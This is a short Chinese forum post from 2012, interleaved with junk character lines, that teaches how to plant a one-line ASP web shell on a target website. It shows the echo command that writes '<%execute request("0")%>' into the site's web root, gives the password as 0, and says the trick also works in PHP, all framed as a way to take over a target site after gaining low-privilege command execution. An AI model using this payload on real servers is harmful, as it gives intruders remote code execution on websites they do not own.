在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 z1 ?2 z, s1 l O
, N; o& Z; @8 E( I, ]命令格式
/ |! T3 Y3 N3 G2 H! f5 M' `' z
4 R- h1 [' P+ Y! x0 c9 t1 `+ KEcho 语句 >目标站绝对目录
/ l, y! E0 @3 I$ h0 T, l* Z' m; E2 m+ [, \; P8 Y; F. J: B
例如:
& `/ S' J" q4 a' m7 O& n' |3 z C- y0 t7 G' s% D: d
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
9 B4 S8 e: ]' I. F. b& `; U7 X' K9 _8 u3 D
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 V/ @, C1 x& R# x5 ^4 r$ G5 j6 k |
发表于 2012-9-23 14:40:24
收藏
支持
反对